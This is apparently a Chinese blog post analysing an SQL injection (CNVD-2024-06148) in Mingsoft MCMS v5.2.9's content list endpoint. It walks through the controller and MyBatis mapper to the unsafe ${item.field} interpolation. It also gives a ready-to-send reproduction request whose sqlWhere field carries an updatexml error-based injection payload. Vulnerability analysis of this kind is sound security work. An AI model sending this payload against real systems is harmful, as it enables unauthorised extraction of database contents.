CNVD-2024-06148 Mingsoft MCMS v5.2.9 前台查询文章列表接口 SQL注入漏洞分析

最新推荐文章于 2024-07-20 23:53:00 发布
最新推荐文章于 2024-07-20 23:53:00 发布
阅读量961 收藏 16
点赞数 21
分类专栏: java代码审计 文章标签: sql 数据库 web安全 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shelter1234567/article/details/137272571
版权
这篇文章详细描述了MingSoftMCMS内容管理系统的一个SQL注入漏洞,源于categoryType参数的验证缺失,攻击者可以借此获取数据库敏感信息。漏洞存在于`/content/list.do`接口,通过构造特定的参数可以执行SQL命令。
摘要由CSDN通过智能技术生成

MCMS是中国铭飞(MingSoft)公司的一个完整开源的J2ee系统。江西铭软科技有限公司MCMS v5.2.9版本存在SQL注入漏洞,该漏洞源于/content/list.do中的categoryType参数缺少对外部输入SQL语句的验证,攻击者可利用该漏洞获取数据库敏感数据。

项目地址

MCMS: 🌈🌈🌈祝开发者2024新年快乐🧧!免费可商用的开源Java CMS内容管理系统/基于SpringBoot 2/前端element UI/提供上百套模板,同时提供实用的插件/每两个月收集issues问题并更新版本/一套简单好用开源免费的Java CMS内容管理系/一整套优质的开源生态内容体系。铭飞的使命就是降低开发成本提高开发效率,提供全方位的企业级开发解决方案。icon-default.png?t=N7T8https://gitee.com/mingSoft/MCMS

参考链接

漏洞复现

POST /cms/content/list.do HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 326
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br

categoryType=1&sqlWhere=%5b%7b%22action%22%3a%22and%22%2c%22field%22%3a%22updatexml(1%2cconcat(0x7e%2c(SELECT%20%20current_user)%2c0x7e)%2c1)%22%2c%22el%22%3a%22eq%22%2c%22model%22%3a%22contentTitle%22%2c%22name%22%3a%22æç« æ é¢%22%2c%22type%22%3a%22input%22%2c%22value%22%3a%22111%22%7d%5d&pageNo=1&pageSize=10

 

漏洞分析

在IContentDao.xml中找到了类似${}的sql语句,这说明此系统至少存在4个sql注入漏洞

我们分析第一个/cms/content/list.do 的sql语句调用

来到控制器层

 

@PostMapping("/list")
@ResponseBody
public ResultData list(@ModelAttribute @ApiIgnore ContentBean content) {
   BasicUtil.startPage();
   List contentList = contentBiz.query(content);
   return ResultData.build().success(new EUListBean(contentList,(int)BasicUtil.endPage(contentList).getTotal()));
}

ContentBean的成员均可为我们可控

跟入contentBiz.query方法

public List<T> query(BaseEntity entity) {
    return this.getDao().query(entity);
}

在跟入getDao().query方法

在IBaseDao.class 中

/** @deprecated */
@Deprecated
<E> E getByEntity(BaseEntity entity);
​
List<E> query(BaseEntity entity);

找到对应的实现类

 

<!--条件查询-->
<select id="query" resultMap="resultContentMap">
   <!--,CONCAT('/html/',ct.app_id,category_path,'/',ct.id,'.html') AS static_url-->
   select ct.* from (
   select ct.*,cc.category_path from cms_content ct
   join cms_category cc on ct.category_id=cc.id
   <where>
      ct.del=0
      <if test="contentTitle != null and contentTitle != ''"> and  content_title like CONCAT(CONCAT('%',#{contentTitle}),'%')</if>
      <if test="categoryId != null and categoryId != ''">    and (ct.category_id=#{categoryId} or ct.category_id in
         (select id FROM cms_category where find_in_set(#{categoryId},CATEGORY_PARENT_IDS)>0))</if>
      <if test="contentType != null and contentType != ''">
         and
         <foreach item="item" index="index" collection="contentType.split(',')" open="(" separator="or"
                close=")">
            FIND_IN_SET(#{item},ct.content_type)>0
         </foreach>
      </if>
      <if test="contentDisplay != null and contentDisplay != ''"> and content_display=#{contentDisplay}</if>
      <if test="contentAuthor != null and contentAuthor != ''"> and content_author=#{contentAuthor}</if>
      <if test="contentSource != null and contentSource != ''"> and content_source=#{contentSource}</if>
      <if test="contentDatetime != null"> and content_datetime=#{contentDatetime} </if>
      <if test="contentSort != null"> and content_sort=#{contentSort} </if>
      <if test="contentImg != null and contentImg != ''"> and content_img=#{contentImg}</if>
      <if test="contentDescription != null and contentDescription != ''"> and content_description=#{contentDescription}</if>
      <if test="contentKeyword != null and contentKeyword != ''"> and content_keyword=#{contentKeyword}</if>
      <if test="contentDetails != null and contentDetails != ''"> and content_details=#{contentDetails}</if>
      <if test="contentUrl != null and contentUrl != ''"> and content_url=#{contentUrl}</if>
      <if test="contentHit != null"> and content_hit=#{contentHit}</if>
      <if test="createBy &gt; 0"> and ct.create_by=#{createBy} </if>
      <if test="createDate != null"> and ct.create_date=#{createDate} </if>
      <if test="updateBy &gt; 0"> and ct.update_by=#{updateBy} </if>
      <if test="updateDate != null"> and update_date=#{updateDate} </if>
      <include refid="net.mingsoft.base.dao.IBaseDao.sqlWhere"></include>
   </where>
   )ct ORDER BY ct.content_datetime desc,content_sort desc
</select>

在查询语句中引用这个 sqlWhere片段,找出来

 

<sql id="sqlWhere" databaseId="mysql">
    <if test="sqlWhereList != null">
    <foreach collection="sqlWhereList" item="item" index="index"
             open="and( " separator=" " close=" )">

        <if test="item.el == 'eq'">
            <choose>
                <when test="item.multiple != null and item.multiple == true">
                    FIND_IN_SET(#{item.value}, ${item.field})>0
                </when>
                <otherwise>
                    ${item.field} = #{item.value}
                </otherwise>
            </choose>
        </if>
        <if test="item.el == 'gt'">
            <choose>
                <when test="item.type=='time'||item.type=='date'">
                    <if test="item.type=='time'">
                        date_format(${item.field},'%T') &gt; date_format(#{item.value},'%T')
                    </if>
                    <if test="item.type=='date'">
                        date_format(${item.field},'%Y-%m-%d %H:%i:%s') &gt; date_format(#{item.value},'%Y-%m-%d %H:%i:%s')
                    </if>
                </when>
                <otherwise>
                    ${item.field} &gt; #{item.value}
                </otherwise>
            </choose>
        </if>
        <if test="item.el == 'gte'">
            ${item.field} &gt;= #{item.value}
        </if>
        <if test="item.el == 'lt'">
            <choose>
                <when test="item.type=='time'||item.type=='date'">
                    <if test="item.type=='time'">
                        date_format(${item.field},'%T') &lt; date_format(#{item.value},'%T')
                    </if>
                    <if test="item.type=='date'">
                        date_format(${item.field},'%Y-%m-%d %H:%i:%s') &lt; date_format(#{item.value},'%Y-%m-%d %H:%i:%s')
                    </if>
                </when>
                <otherwise>
                    ${item.field} &lt; #{item.value}
                </otherwise>
            </choose>
        </if>
        <if test="item.el == 'lte'">
            ${item.field} &lt;= #{item.value}
        </if>
        <if test="item.el == 'like'">
            ${item.field} like CONCAT(CONCAT('%',#{item.value}),'%')
        </if>
        <if test="item.el == 'likeLeft'">
            ${item.field} like CONCAT(CONCAT(#{item.value}),'%')
        </if>
        <if test="item.el == 'likeRight'">
            ${item.field} like CONCAT('%',#{item.value})
        </if>
        <if test="item.el == 'in'">
            ${item.field} in (${item.value})
        </if>
        <if test="item.el == 'range'">
            <if test="item.type=='time'">
                date_format(${item.field},'%T') BETWEEN date_format(#{item.value[0]},'%T') AND date_format(#{item.value[1]},'%T')
            </if>
            <if test="item.type=='date'">
                date_format(${item.field},'%Y-%m-%d %H:%i:%s') BETWEEN date_format(#{item.value[0]},'%Y-%m-%d %H:%i:%s') AND date_format(#{item.value[1]},'%Y-%m-%d %H:%i:%s')
            </if>
        </if>

        <if test="index != (sqlWhereList.size() - 1)">
            <choose>
                <!--防注入-->
                <when test="item.action == 'and' or item.action == 'or'">
                    ${item.action}
                </when>
                <otherwise>
                    and
                </otherwise>
            </choose>
        </if>
    </foreach>
    </if>
</sql>

注意${}的引用

    <if test="item.el == 'eq'">
        <choose>
            <when test="item.multiple != null and item.multiple == true">
                FIND_IN_SET(#{item.value}, ${item.field})>0
            </when>
            <otherwise>
                ${item.field} = #{item.value}
            </otherwise>
        </choose>
    </if>

类似于这样where xxx=xxxx 是可以照成sql注入的,

所以参数写成写成这样

[{"action":"and","field":"updatexml(1,concat(0x7e,(SELECT current_user),0x7e),1)","el":"eq","model":"contentTitle","name":"æç« æ é¢","type":"input","value":"111"}]

重要的就是field字段 以及没有multiple字段

 

 

昵称还在想呢
关注
专栏目录
铭飞CMS SQL注入漏洞复现(CNVD-2024-06148)
0xSec
04-30 815
由于铭飞CMS文章列表接口content/list.do中的sqlWhere参数缺少对外部输入SQL语句的验证,未经身份验证的攻击者可利用该漏洞获取数据库敏感数据,进一步利用可获取服务器权限。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 915
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
铭飞CMS SQL注入漏洞
最新发布
weixin_44513407的博客
07-20 788
铭飞CMS是一款基于的一套轻量级开源内容管理系统漏洞版本:铭飞MCMS5.2.8。
铭飞 MCMS 存在SQL注入漏洞
wan___she__pi的博客
04-16 795
铭飞(MCMS)是一种计算机管理系统,用于管理和监控计算机网络中的各种设备和资源。MCMS可以帮助管理员轻松地配置、监视和维护网络设备,提供网络拓扑图、设备状态、流量监控、安全性管理等功能。MCMS是一个<完整开源的Java CMS!基于SpringBoot 2架构,前端基于vue、element ui。MCMS存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息等。sqlmap跑一梭子。
Goby漏洞更新|铭飞 MCMS shiro 反序列化漏洞(CVE-2022-22928)
m0_46699477的博客
04-13 669
铭飞 MCMS shiro 反序列化漏洞(CVE-2022-22928)
Discuz开源论坛_v3.1系列_Sql注入漏洞详解
weixin_60708754的博客
05-12 1312
Discuz v3.1系列版本 Sql注入全流程详解
linux运行Mcms,Siemens SIMATIC HMI多个不明细节跨站脚本执行漏洞
weixin_31434215的博客
04-30 120
发布日期:2012-01-30更新日期:2012-04-19受影响系统:Siemens SIMATIC HMISiemens SIMATIC HMI Smart Options描述:--------------------------------------------------------------------------------BUGTRAQ ID: 51835CVE ID: CVE...
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
CNVD-2019-34241 SQL注入.MD
03-20
CNVD-2019-34241 SQL注入.MD
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
铭飞CMS源码
05-11
供前端页面实现搜索功能,实现前端页面根据标题,商品名,主题名称,关键字等进行相对应的搜索。
MS-MCMS内容管理系统 v4.5.2
10-28
铭飞MCMS(铭飞内容管理系统)是一款支持不同平台、不同终端并且支持多站点的内容管理系统,SpringMVC4+Spring4+MyBatis3+Freemarker技术架构基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点;标签化建站,只要你懂html就能建站;完全生成全站静态页面;可自定义路径结构,全面提高页面访问速度;铭飞MCMS是企业在创立初期很好的技术基础框架,加快公司项目开发进度,当然也可以对现有的系统进行升级;个人开发者也可以使用MCMS承接外包项目;初学JAVA的同学可以下载源代码来进行学习交流;开发框及语言特点:免费开源 铭飞MCMS支持PC与MOBILE皮肤定制,同时使用MS团队移动JS插件,轻松实现手机多屏幕适配,想想看你发布的信息第一时间在PC上展示又能在手机上展示,这是件多么幸福的事情,数据统一、平台统一、终端统一是MS团队一直在努力的方向;扩展性 铭飞MCMS提供了行业内最完美的升级方案,从此升级无需手动下载复制粘贴,一切完全由MS升级插件无缝完成;文档手册提永久升级服务技术交流群,不定期会升级系统,开发可以关注后台的更新板块;面向对象
Web安全 | EmpireCMS漏洞常见漏洞分析及复现
Javachichi的博客
03-05 2148
本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现。
铭飞CMS list 接口 SQL注入漏洞复现
0xSec
12-14 1005
铭飞CMS在5.2.10版本以前list 接口处存在sql注入漏洞,能够利用该漏洞获取敏感信息,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
一篇文章搞懂SQL注入
s40d1's Blog
07-24 1413
文章目录0X00 数据库相关概念数据(DATA):图像、语音、文字数据库(Database):Access、MSSQL、Oracle、SQLITE、MySQL数据库管理系统(DBMS):Access、MSSQL、Oracle、SQLITE、MySQL等结构化查询语言(SQL):DQL、DDL、DML、TCL、DCL数据库常见的操作1、增删改查:insert,update,delete,select2、SQL order by 语句3、union联合查询4、MySql数据库4.1 COLUMNS表查询数据库
cms漏洞复现-前台任意用户密码修改漏洞
yummy11111的博客
07-21 419
cms漏洞复现
卧槽,SQL注入竟然把我们的系统搞挂了!
码农翻身
02-21 1540
前言先来给大家看个漫画,原创是xkcd,我把它翻译成了中文。如果你能在看漫画的时候能会心一笑,基本上就理解什么是SQL注入了,这里再啰嗦两句, 来个更简单的例子, 例如这个SQL做了字符...
泛微e-cologyOA系统WorkflowCenterTreeData SQL注入分析
"CNVD-2019-34241是一个关于泛微e-cologyOA系统中WorkflowCenterTreeData存在的SQL注入漏洞。该漏洞可能允许攻击者通过构造恶意请求来执行任意的SQL命令,对数据库进行非法操作,可能导致数据泄露、系统权限提升或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值